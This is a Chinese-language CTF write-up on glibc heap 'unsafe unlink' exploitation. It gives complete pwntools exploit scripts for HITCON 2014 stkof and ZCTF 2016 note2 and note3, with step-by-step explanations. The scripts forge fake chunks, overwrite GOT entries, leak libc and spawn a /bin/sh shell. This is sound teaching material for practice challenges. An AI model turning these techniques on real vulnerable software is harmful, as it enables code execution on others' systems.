介绍与原理

主要是内存布局好之后,通过 unlink 来修改指针

正常的 unlink 是当我们去 free 一个 chunk 的时候,如果这个 chunk 的前一个或后一个是 free 的状态,glibc 会把它从链表里面取出来,与现在要 free 的这个合并再放进去,取出来的这个过程就是 unlink

wiki 上面的一个示意图,Fd 是前置指针,Bk 是后置指针

unsafe unlink - 图1

ulink 有一个保护检查机制,他会检查这个 chunk 的前一个 chunk 的 bk 指针是不是指向这个 chunk(后一个也一样)我们需要绕过他的检查

语雀内容

2014 HITCON stkof

这个师傅注释很详细,帮了大忙,下面也是根据这个 exp 复现的
https://blog.csdn.net/weixin_42151611/article/details/97016767

完整 exp:

  1. #coding:utf-8
  2. from pwn import *
  3. context(arch='amd64',os='linux')
  4. #context.log_level = 'debug'
  5. p = process('./pwn')
  6. elf = ELF('./pwn')
  7. libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  8. def create(size):
  9. p.sendline('1')
  10. p.sendline(str(size))
  11. p.recvuntil('OK\n')
  12. def edit(index,size,content):
  13. p.sendline('2')
  14. p.sendline(str(index))
  15. p.sendline(str(size))
  16. p.send(content)
  17. #之所以用send是因为如果sendline的话会多读入一个'\n'
  18. #导致size和content的长度不匹配,导致错误
  19. p.recvuntil('OK\n')
  20. def delete(index):
  21. p.sendline('3')
  22. p.sendline(str(index))
  23. head = 0x602140
  24. create(0x10)#第一块
  25. create(0x30) #第二块
  26. create(0x80) #第三块
  27. payload = p64(0)+p64(0x20)+p64(head+16-0x18)+p64(head+16-0x10)+p64(0x20)
  28. payload = payload.ljust(0x30,'a')
  29. payload += p64(0x30)+p64(0x90)
  30. edit(2,len(payload),payload)
  31. gdb.attach(p)
  32. pause()
  33. delete(3)
  34. p.recvuntil('OK\n')
  35. free_got = elf.got['free']
  36. puts_got = elf.got['puts']
  37. atoi_got = elf.got['atoi']
  38. puts_plt = elf.plt['puts']
  39. payload = p64(0)+p64(free_got)+p64(puts_got)+p64(atoi_got)
  40. edit(2,len(payload),payload)
  41. payload = p64(puts_plt)
  42. edit(0,len(payload),payload)
  43. delete(1)
  44. leak = p.recvuntil('\nOK\n')[:6]
  45. puts_addr = u64(leak.ljust(8,'\x00'))
  46. log.success('puts addr: '+hex(puts_addr))
  47. libc_base = puts_addr - libc.symbols['puts']
  48. log.success('libc_base: '+hex(libc_base))
  49. sys_addr = libc_base + libc.symbols['system']
  50. log.success('sys_addr: '+hex(sys_addr))
  51. payload = p64(sys_addr)
  52. edit(2,len(payload),payload)
  53. payload = '/bin/sh\x00'
  54. p.sendline(payload)
  55. p.interactive()

运行连个菜单都不给…
把名字改一下

image.png

create 功能,输入一个 size,然后申请 size 大小的堆块

image.png

会把申请的堆块的地址写到这里(并不是,是 s[1],因为先 ++ 了)

image.png

edit 功能,编辑已经创建好的堆块,但是没有对长度进行检查,所以存在堆溢出

image.png

wp 说没有 setbuf,会先申请 1024 的堆空间??
要先提前申请个 chunk 来防止他们干扰??
怎么就能防止干扰了??
其实只要先申请一个,让程序把两个缓冲区分配好了,别后面插在我们申请的两个之间就可以吧
黄色指的是提前申请的一个用来占空的
两个白色是缓冲区占用的,这样后面再申请就连起来了

image.png

这时候来改写第 2 个(从 1 开始计数)伪造一个 free 的 chunk(黄线分割了第 2 和第 3 个)

image.png

payload 如下:

  1. payload = p64(0)+p64(0x20)+p64(head+16-0x18)+p64(head+16-0x10)+p64(0x20)
  2. payload = payload.ljust(0x30,'a')
  3. payload += p64(0x30)+p64(0x90)

这样填充完了就是这样的,在原本第 2 个 chunk 里面伪造了一个 free 的 chunk,大小是 0x20,然后把 fd 跟 bk 指针写为了 p64(head+16-0x18) 和 p64(head+16-0x10)。同时把下一个堆块的 prev_size 位写成了 0x30(前一个 chunk 加上开头的大小),以及 size 位的 prev_inuse 为 0

image.png

这样,对第 3 个进行 free 的时候会发生 unlink,head + 16 与 head +16 -0x18
那么最终的效果就是我们编辑第二个的时候就是编辑的 head + 16 - 0x18,也就是 0x602138

image.png

那么

  1. payload = p64(0)+p64(free_got)+p64(puts_got)+p64(atoi_got)
  2. edit(2,len(payload),payload)

因为此时的第二块指的是head-8,所以首先要填充8位,然后修改 s[0]=free_got,s[1]=puts_got,s[2]=atoi_got
修改完之后(虽然程序用的是 s[1] 开始记录指针的,但是 0 也是能用的啊)

image.png

这时候去修改第 0 个,修改的就是 0x602018 也就是 free 的 got 表项,改成 puts_plt,之后再调用 free 函数的时候就会调用 puts 了

  1. payload = p64(puts_plt)
  2. edit(0,len(payload),payload)

那么 free(1) 的话就相当于 puts 了 puts 的 got 也就得到了 puts 函数的真实地址,从而可以用来计算 libc

算出 libc 的基址就能得到 system 函数的地址,然后通过编辑第 2 个再把 atoi 改成 system 的地址

  1. payload = p64(sys_addr)
  2. edit(2,len(payload),payload)

因为输入的时候就是往 atoi 中输入的,所以直接 sendline(“/bin/sh”) 就可以达到 system(“/bin/sh”) 的效果

2016 ZCTF note2

exp

  1. # coding=UTF-8
  2. from pwn import *
  3. context.log_level = 'debug'
  4. p = process('./note2')
  5. note2 = ELF('./note2')
  6. libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  7. context.log_level = 'debug'
  8. def create(length, content):
  9. p.recvuntil('option--->>')
  10. p.sendline('1')
  11. p.recvuntil('(less than 128)')
  12. p.sendline(str(length))
  13. p.recvuntil('content:')
  14. p.sendline(content)
  15. def show(id):
  16. p.recvuntil('option--->>')
  17. p.sendline('2')
  18. p.recvuntil('note:')
  19. p.sendline(str(id))
  20. def edit(id, choice, s):
  21. p.recvuntil('option--->>')
  22. p.sendline('3')
  23. p.recvuntil('note:')
  24. p.sendline(str(id))
  25. p.recvuntil('2.append]')
  26. p.sendline(str(choice))
  27. p.sendline(s)
  28. def delete(id):
  29. p.recvuntil('option--->>')
  30. p.sendline('4')
  31. p.recvuntil('note:')
  32. p.sendline(str(id))
  33. p.sendlineafter('name:','yichen')
  34. p.sendlineafter('address:','yichen')
  35. ptr=0x602120
  36. payload='a'*8+p64(0x61)+p64(ptr-0x18)+p64(ptr-0x10)+'a'*64+p64(0x60)
  37. create(0x80,payload)
  38. create(0,'a'*16)
  39. create(0x80,'a'*16)
  40. delete(1)
  41. content='a'*16+p64(0xa0)+p64(0x90)
  42. create(0,content)
  43. delete(2)
  44. atoi_got = note2.got['atoi']
  45. content = 'a' * 0x18 + p64(atoi_got)
  46. edit(0, 1, content)
  47. show(0)
  48. atoi_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
  49. atoi_offest = libc.symbols['atoi']
  50. libcbase = atoi_addr - atoi_offest
  51. system_offest = libc.symbols['system']
  52. system_addr = libcbase + system_offest
  53. content = p64(system_addr)
  54. edit(0, 1, content)
  55. p.recvuntil('option--->>')
  56. p.sendline('/bin/sh')
  57. p.interactive()

程序功能如下

image.png

image.png

申请的内容会放到 &ptr+dword_602160 这里,总共只能申请 3 个

image.png

首先,申请的时候有一个 0x0 的,但是要有个 chunk 头和记录 fd、bk 的地方,所以实际分配的是 0x20
第 0 个写入的内容中构造了一个 fake chunk,大小是 0x50,它的 fd、bk 是 ptr - 0x18 和 ptr - 0x10

image.png

但是下一个的 chunk 的 prev_size 我们没法改变,那么之前申请的那个 0x0 的第 1 个就派上用场了,首先把申请的第 1 个给释放掉,因为是 fastbin 所以我们再次申请 0x0 大小的时候还是会申请到这个地方,而同时,因为 i 是一个无符号型的,我们输入的 0-1 就会变成一个很大的数,所以我们可以写很多的内容,从而覆盖掉后一个 chunk 给他改写掉

其中 i 是 unsigned 类型,a2 为 int 类型,所以两者在 for 循环相比较的时候,a2-1 的结果 - 1 会被视为 unsigned 类型,此时,即最大的整数。所以说可以读取任意长度的数据,这里也就是后面我们溢出所使用的办法。

image.png

这里我想在开始就改写,但是不行,原因大概是一开始下面的那个 chunk 没有申请,溢出的那块地址没法写入?
所以先把第 1 个释放掉,在申请回来

  1. delete(1)
  2. content='a'*16+p64(0xa0)+p64(0x90)
  3. create(0,content)

image.png

之后再去释放第 2 个,就会把第 0 个构造的 fake chunk 给 unlink
unlink 之后的结果就是 ptr = ptr-0x18

现在修改第 0 个就是修改的 ptr-0x18,所以我们先写上 0x18 个 a 占空,然后写上 atoi 的 got 表项,这样使用 show 功能的时候就会 show atoi 的 got 表项的内容

  1. atoi_got = note2.got['atoi']
  2. content = 'a' * 0x18 + p64(atoi_got)
  3. editnote(0, 1, content)

然后根据得到的 atoi 的地址来算出 system 的地址
因为此时 ptr 指向的是 atoi 的 got 表项,所以我们直接编辑第 0 个就可以把 atoi 的 got 表项改成 system 的地址

至于为啥是 atoi他接收 option 输入的时候用的是 atoi 函数

image.png

image.png

2016 ZCTF note3

show 功能没了

image.png

申请的 malloc 的地址会存在 ptr=0x6020C8

image.png

再编辑的时候如果大小是 0 的话,照样会变成一个很大的数字,所以存在堆溢出

image.png

一开始申请三个 chunk(index 从 0 开始),第一个里面直接构造一个 fake chunk

image.png

然后先把第 1 个 delete,然后在申请回来就能通过负数来获得一个很大的 size
把第 2 个给改掉,这样当 delete 的时候就能进行 unlink,这样 ptr 就等于 ptr-0x18 了
然后就能通过写第 0 个来改变 ptr-0x18 处的内容

  1. payload3 = 'a'*0x18 + p64(free_got) + p64(puts_got)
  2. edit(0,payload3)
  3. edit(0,p64(puts_plt)[:-1])
  4. delete(1)

注意这里的 [:-1] 由于 p64 总共 8 个字节,如果不加上 [:-1] 会由于 sendline 最后的 \n 覆盖掉与它紧邻位置的数据。而为什么能使用 [:-1]? 可以输出 hex(p64(puts_plt)) 试一下,会发现它是 0x0000xxxxxxxxxx 的形式,前面会有至少 2 个 00,再加上小端序的问题,我们就相当于丢掉了开头的 2 个 00,这样并不会产生太大影响,最主要的是我们保护了与它紧邻的数据。 http://liul14n.top/2020/02/06/Unlink-ZCTF-2016-note3/

这样就能泄露出 puts 的真实地址,然后计算出 system 的地址,这时候再去申请一个,会发现他是第 1 个

image.png

那么把 free 的 got 表项改成 system,就能执行 system(“/bin/sh”)

  1. from pwn import *
  2. p=process('./note3')
  3. elf=ELF('./note3')
  4. libc=ELF('./libc.so.6')
  5. def cmd(choice):
  6. p.sendlineafter('option--->>\n',str(choice))
  7. def create(size,content):
  8. cmd(1)
  9. p.sendlineafter('1024)\n',str(size))
  10. p.sendlineafter('content:\n',content)
  11. def edit(index,content):
  12. cmd(3)
  13. p.sendlineafter('note:\n',str(index))
  14. p.sendlineafter('content:\n',content)
  15. def delete(index):
  16. cmd(4)
  17. p.sendlineafter('note:\n',str(index))
  18. ptr=0x6020C8
  19. fake_chunk='a'*8+p64(0xa1)+p64(ptr-0x18)+p64(ptr-0x10)
  20. create(0x80,fake_chunk)
  21. create(0,'123')
  22. create(0x80,'writeup')
  23. delete(1)
  24. payload='a'*0x10 + p64(0xa0) + p64(0x90)
  25. create(0,payload)
  26. delete(2)
  27. puts_got = elf.got["puts"]
  28. puts_plt = elf.plt["puts"]
  29. free_got = elf.got["free"]
  30. system = libc.symbols['system']
  31. puts = libc.symbols['puts']
  32. payload3 = 'a'*0x18 + p64(free_got) + p64(puts_got)
  33. edit(0,payload3)
  34. edit(0,p64(puts_plt)[:-1])
  35. delete(1)
  36. puts_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
  37. create(0x20,'/bin/sh\00')
  38. libcbase = puts_addr - puts
  39. system_addr = libcbase + system
  40. edit(0,p64(system_addr)[:-1])
  41. delete(1)
  42. p.interactive()